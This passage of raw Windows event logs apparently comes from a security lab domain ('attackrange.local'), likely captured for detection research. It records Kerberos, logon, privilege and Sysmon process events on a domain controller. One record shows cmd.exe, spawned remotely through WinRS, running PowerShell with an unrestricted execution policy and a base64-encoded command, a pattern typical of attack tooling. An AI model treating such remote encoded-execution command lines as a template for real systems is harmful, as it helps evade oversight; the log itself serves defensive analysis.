requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x44735","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"49695","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4799,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":13826,"OpcodeValue":0,"RecordNumber":220320,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A security-enabled local group membership was enumerated.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nGroup:\r\n\tSecurity ID:\t\tS-1-5-32-544\r\n\tGroup Name:\t\tAdministrators\r\n\tGroup Domain:\t\tBuiltin\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x478\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe","Category":"Security Group Management","Opcode":"Info","TargetUserName":"Administrators","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","CallerProcessId":"0x478","CallerProcessName":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":37,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76828,"ProcessID":1224,"ThreadID":2000,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time provider NtpClient is currently receiving valid time data from time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123->13.86.101.172:123).","Opcode":"Info","TimeSource":"time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123-&gt;13.86.101.172:123)","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":10016,"SourceName":"Microsoft-Windows-DistributedCOM","ProviderGuid":"{1B562E86-B7AA-4131-BADC-B6F3A001407E}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76829,"ProcessID":996,"ThreadID":852,"Channel":"System","Domain":"ATTACKRANGE","AccountName":"Administrator","UserID":"S-1-5-21-1117747729-287425051-3091891954-500","AccountType":"User","Message":"The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID \r\n{D63B10C5-BB46-4990-A94F-E40B9D520160}\r\n and APPID \r\n{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}\r\n to the user ATTACKRANGE\\Administrator SID (S-1-5-21-1117747729-287425051-3091891954-500) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.","Opcode":"Info","param1":"application-specific","param2":"Local","param3":"Activation","param4":"{D63B10C5-BB46-4990-A94F-E40B9D520160}","param5":"{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}","param6":"ATTACKRANGE","param7":"Administrator","param8":"S-1-5-21-1117747729-287425051-3091891954-500","param9":"LocalHost (Using LRPC)","param10":"Unavailable","param11":"Unavailable","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220321,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220322,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{2EA09B96-FE62-51BC-744A-7524CEC268C2}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{2EA09B96-FE62-51BC-744A-7524CEC268C2}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220323,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{2EA09B96-FE62-51BC-744A-7524CEC268C2}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{2EA09B96-FE62-51BC-744A-7524CEC268C2}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220324,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x458FC\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{2EA09B96-FE62-51BC-744A-7524CEC268C2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x458fc","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{2EA09B96-FE62-51BC-744A-7524CEC268C2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220325,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x458FC\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x458fc","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2439,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2440,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.819\r\nProcessGuid: {A837DB8D-01DD-5F25-0000-001030590400}\r\nProcessId: 4180\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-01DA-5F25-0000-002027420400}\r\nLogonId: 0x44227\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01DD-5F25-0000-00102C560400}\r\nParentProcessId: 4104\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.819","ProcessGuid":"{A837DB8D-01DD-5F25-0000-001030590400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-01DA-5F25-0000-002027420400}","LogonId":"0x44227","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01DD-5F25-0000-00102C560400}","ParentProcessId":"4104","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2441,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01DD-5F25-0000-00102C560400}\r\nSourceProcessId: 4104\r\nSourceThreadId: 4156\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-001030590400}\r\nTargetProcessId: 4180\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01DD-5F25-0000-00102C560400}","SourceProcessId":"4104","SourceThreadId":"4156","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-001030590400}","TargetProcessId":"4180","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2442,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-001030590400}\r\nTargetProcessId: 4180\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 